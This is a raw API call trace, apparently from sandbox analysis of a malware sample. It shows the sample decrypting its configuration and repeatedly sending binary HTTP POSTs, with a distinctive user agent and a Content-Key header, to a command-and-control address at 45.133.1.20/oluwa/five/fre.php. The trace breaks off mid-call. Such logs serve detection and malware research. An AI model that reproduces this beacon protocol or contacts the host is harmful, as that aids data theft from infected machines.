LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.023] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0225.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.024] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0225.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.025] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0225.025] GetProcessHeap () returned 0x6a0000 [0225.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0225.038] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0225.038] GetProcessHeap () returned 0x6a0000 [0225.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0225.038] socket (af=2, type=1, protocol=6) returned 0x6a4 [0225.038] connect (s=0x6a4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0225.074] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0225.074] GetProcessHeap () returned 0x6a0000 [0225.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0225.075] GetProcessHeap () returned 0x6a0000 [0225.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0225.077] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0225.078] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0225.078] GetProcessHeap () returned 0x6a0000 [0225.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0225.078] GetProcessHeap () returned 0x6a0000 [0225.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0225.079] GetProcessHeap () returned 0x6a0000 [0225.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0225.079] GetProcessHeap () returned 0x6a0000 [0225.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0225.080] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0225.081] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0225.081] GetProcessHeap () returned 0x6a0000 [0225.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0225.081] GetProcessHeap () returned 0x6a0000 [0225.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0225.082] send (s=0x6a4, buf=0x6b5c98*, len=242, flags=0) returned 242 [0225.082] send (s=0x6a4, buf=0x6bb998*, len=159, flags=0) returned 159 [0225.082] GetProcessHeap () returned 0x6a0000 [0225.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0225.082] recv (in: s=0x6a4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0225.171] GetProcessHeap () returned 0x6a0000 [0225.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0225.172] GetProcessHeap () returned 0x6a0000 [0225.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0225.172] GetProcessHeap () returned 0x6a0000 [0225.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0225.173] GetProcessHeap () returned 0x6a0000 [0225.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0225.173] closesocket (s=0x6a4) returned 0 [0225.173] GetProcessHeap () returned 0x6a0000 [0225.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0225.174] GetProcessHeap () returned 0x6a0000 [0225.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0225.174] GetProcessHeap () returned 0x6a0000 [0225.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0225.174] GetProcessHeap () returned 0x6a0000 [0225.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0225.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf94) returned 0x6a4 [0225.177] Sleep (dwMilliseconds=0xea60) [0225.180] GetProcessHeap () returned 0x6a0000 [0225.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0225.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.182] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0225.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.190] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0225.202] GetProcessHeap () returned 0x6a0000 [0225.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8a40 [0225.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.203] CryptImportKey (in: hProv=0x6bef48, pbData=0x6d8a40, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0225.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.205] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.206] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.206] GetProcessHeap () returned 0x6a0000 [0225.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8a40 | out: hHeap=0x6a0000) returned 1 [0225.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.208] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0225.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.209] CryptDestroyKey (hKey=0x6ad020) returned 1 [0225.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.212] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0225.212] GetProcessHeap () returned 0x6a0000 [0225.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0225.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.213] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0225.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.223] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0225.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.224] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0225.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.225] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0225.225] GetProcessHeap () returned 0x6a0000 [0225.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0225.225] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0225.225] GetProcessHeap () returned 0x6a0000 [0225.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0225.226] GetProcessHeap () returned 0x6a0000 [0225.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0225.226] GetProcessHeap () returned 0x6a0000 [0225.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0225.227] GetProcessHeap () returned 0x6a0000 [0225.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0225.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0225.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.235] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0225.241] GetProcessHeap () returned 0x6a0000 [0225.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0225.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.243] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0225.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.245] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.246] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.246] GetProcessHeap () returned 0x6a0000 [0225.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0225.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.248] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0225.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.249] CryptDestroyKey (hKey=0x6ad560) returned 1 [0225.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.249] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0225.249] GetProcessHeap () returned 0x6a0000 [0225.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0225.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.250] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0225.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.251] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0225.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.256] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0225.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.258] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0225.258] GetProcessHeap () returned 0x6a0000 [0225.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0225.259] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0225.259] GetProcessHeap () returned 0x6a0000 [0225.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0225.259] socket (af=2, type=1, protocol=6) returned 0x6a8 [0225.260] connect (s=0x6a8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0225.282] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0225.283] GetProcessHeap () returned 0x6a0000 [0225.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0225.283] GetProcessHeap () returned 0x6a0000 [0225.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0225.284] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0225.287] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0225.287] GetProcessHeap () returned 0x6a0000 [0225.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0225.287] GetProcessHeap () returned 0x6a0000 [0225.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0225.289] GetProcessHeap () returned 0x6a0000 [0225.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0225.289] GetProcessHeap () returned 0x6a0000 [0225.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0225.290] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0225.291] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0225.292] GetProcessHeap () returned 0x6a0000 [0225.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0225.292] GetProcessHeap () returned 0x6a0000 [0225.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0225.292] send (s=0x6a8, buf=0x6b5c98*, len=242, flags=0) returned 242 [0225.293] send (s=0x6a8, buf=0x6bb998*, len=159, flags=0) returned 159 [0225.293] GetProcessHeap () returned 0x6a0000 [0225.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0225.293] recv (in: s=0x6a8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0225.420] GetProcessHeap () returned 0x6a0000 [0225.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0225.421] GetProcessHeap () returned 0x6a0000 [0225.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0225.421] GetProcessHeap () returned 0x6a0000 [0225.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0225.422] GetProcessHeap () returned 0x6a0000 [0225.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0225.422] closesocket (s=0x6a8) returned 0 [0225.423] GetProcessHeap () returned 0x6a0000 [0225.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0225.423] GetProcessHeap () returned 0x6a0000 [0225.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0225.424] GetProcessHeap () returned 0x6a0000 [0225.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0225.424] GetProcessHeap () returned 0x6a0000 [0225.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0225.425] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x850) returned 0x6a8 [0225.427] Sleep (dwMilliseconds=0xea60) [0225.440] GetProcessHeap () returned 0x6a0000 [0225.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0225.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.443] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0225.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.453] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0225.461] GetProcessHeap () returned 0x6a0000 [0225.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0225.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.469] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0225.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.470] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.470] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.470] GetProcessHeap () returned 0x6a0000 [0225.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0225.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.472] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0225.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.473] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0225.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.477] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0225.477] GetProcessHeap () returned 0x6a0000 [0225.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0225.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.478] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0225.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.479] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0225.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.480] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0225.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.481] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0225.481] GetProcessHeap () returned 0x6a0000 [0225.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0225.481] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0225.481] GetProcessHeap () returned 0x6a0000 [0225.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0225.482] GetProcessHeap () returned 0x6a0000 [0225.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0225.482] GetProcessHeap () returned 0x6a0000 [0225.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0225.482] GetProcessHeap () returned 0x6a0000 [0225.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0225.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.484] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0225.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.493] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0225.502] GetProcessHeap () returned 0x6a0000 [0225.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0225.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.504] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0225.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.505] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.506] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.506] GetProcessHeap () returned 0x6a0000 [0225.507] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0225.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.509] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0225.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.510] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0225.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0225.511] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0225.511] GetProcessHeap () returned 0x6a0000 [0225.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0225.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.513] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0225.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.514] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0225.515] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.515] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0225.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0225.519] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0225.519] GetProcessHeap () returned 0x6a0000 [0225.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0225.519] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: 